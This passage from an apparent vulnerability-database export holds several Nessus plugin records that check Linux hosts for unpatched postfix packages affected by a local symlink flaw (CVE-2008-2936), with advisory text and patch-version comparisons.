or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"postfix-2.2.10-1.2.1.c4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"ia64\", reference:\"postfix-pflogsumm-2.2.10-1.2.1.c4\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-pflogsumm\");\n}\n", "cvss": {"score": 6.2, "vector": 
"AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:44:00", "description": "A flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : postfix on SL3.x, SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080814_POSTFIX_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60464", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60464);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\");\n\n script_name(english:\"Scientific Linux Security Update : postfix on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. 
(CVE-2008-2936)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0808&L=scientific-linux-errata&T=0&P=1407\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3d4cd9ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix and / or postfix-pflogsumm packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"postfix-2.2.10-1.2.1.el4_7\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postfix-pflogsumm-2.2.10-1.2.1.el4_7\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:06:16", "description": "Updated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix 
dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.", "edition": 27, "published": "2008-08-15T00:00:00", "title": "RHEL 3 / 4 / 5 : postfix (RHSA-2008:0839)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-15T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:postfix-pflogsumm", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.2", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:postfix"], "id": "REDHAT-RHSA-2008-0839.NASL", "href": "https://www.tenable.com/plugins/nessus/33893", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0839. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33893);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"RHSA\", value:\"2008:0839\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : postfix (RHSA-2008:0839)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. 
(CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0839\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix and / or postfix-pflogsumm packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:postfix-pflogsumm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0839\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"postfix-2.2.10-1.2.1.el4_7\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"postfix-pflogsumm-2.2.10-1.2.1.el4_7\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n 
tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-pflogsumm\");\n }\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:13", "description": "From Red Hat Security Advisory 2008:0839 :\n\nUpdated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.", "edition": 24, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 / 5 : postfix (ELSA-2008-0839)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:3", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:postfix-pflogsumm", "p-cpe:/a:oracle:linux:postfix"], "id": "ORACLELINUX_ELSA-2008-0839.NASL", "href": "https://www.tenable.com/plugins/nessus/67738", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0839 and \n# Oracle Linux Security Advisory ELSA-2008-0839 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67738);\n 
script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\");\n script_bugtraq_id(30691);\n script_xref(name:\"RHSA\", value:\"2008:0839\");\n\n script_name(english:\"Oracle Linux 3 / 4 / 5 : postfix (ELSA-2008-0839)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0839 :\n\nUpdated postfix packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH\n(SASL), and TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a\nlocal user has write access to a mail spool directory with no root\nmailbox, it may be possible for them to append arbitrary data to files\nthat root has write permission to. 
(CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly\ndisclosing this issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000708.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000709.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-August/000710.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:postfix-pflogsumm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"postfix-2.0.16-14.1.RHEL3\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"postfix-2.2.10-1.2.1.el4_7\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"postfix-pflogsumm-2.2.10-1.2.1.el4_7\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"postfix-2.3.3-2.1.el5_2\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"postfix-pflogsumm-2.3.3-2.1.el5_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix / postfix-pflogsumm\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:46:57", "description": "A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. 
CVE-2008-2936 and\nCVE-2008-2937 have been assigned to this problem.", "edition": 24, "published": "2008-08-15T00:00:00", "title": "openSUSE 10 Security Update : postfix (postfix-5501)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "modified": "2008-08-15T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postfix-devel", "p-cpe:/a:novell:opensuse:postfix-mysql", "cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:postfix-postgresql", "p-cpe:/a:novell:opensuse:postfix"], "id": "SUSE_POSTFIX-5501.NASL", "href": "https://www.tenable.com/plugins/nessus/33897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postfix-5501.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33897);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2936\", \"CVE-2008-2937\");\n\n script_name(english:\"openSUSE 10 Security Update : postfix (postfix-5501)\");\n script_summary(english:\"Check for the postfix-5501 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. 
CVE-2008-2936 and\nCVE-2008-2937 have been assigned to this problem.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postfix packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postfix-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 
\"openSUSE\");\nif (release !~ \"^(SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"postfix-2.3.2-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"postfix-devel-2.3.2-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"postfix-mysql-2.3.2-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"postfix-postgresql-2.3.2-32\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-2.4.5-20.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-devel-2.4.5-20.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-mysql-2.4.5-20.4\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"postfix-postgresql-2.4.5-20.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postfix\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:46:57", "description": "A (local) privilege escalation vulnerability as well as a mailbox\nownership problem has been fixed in postfix. 
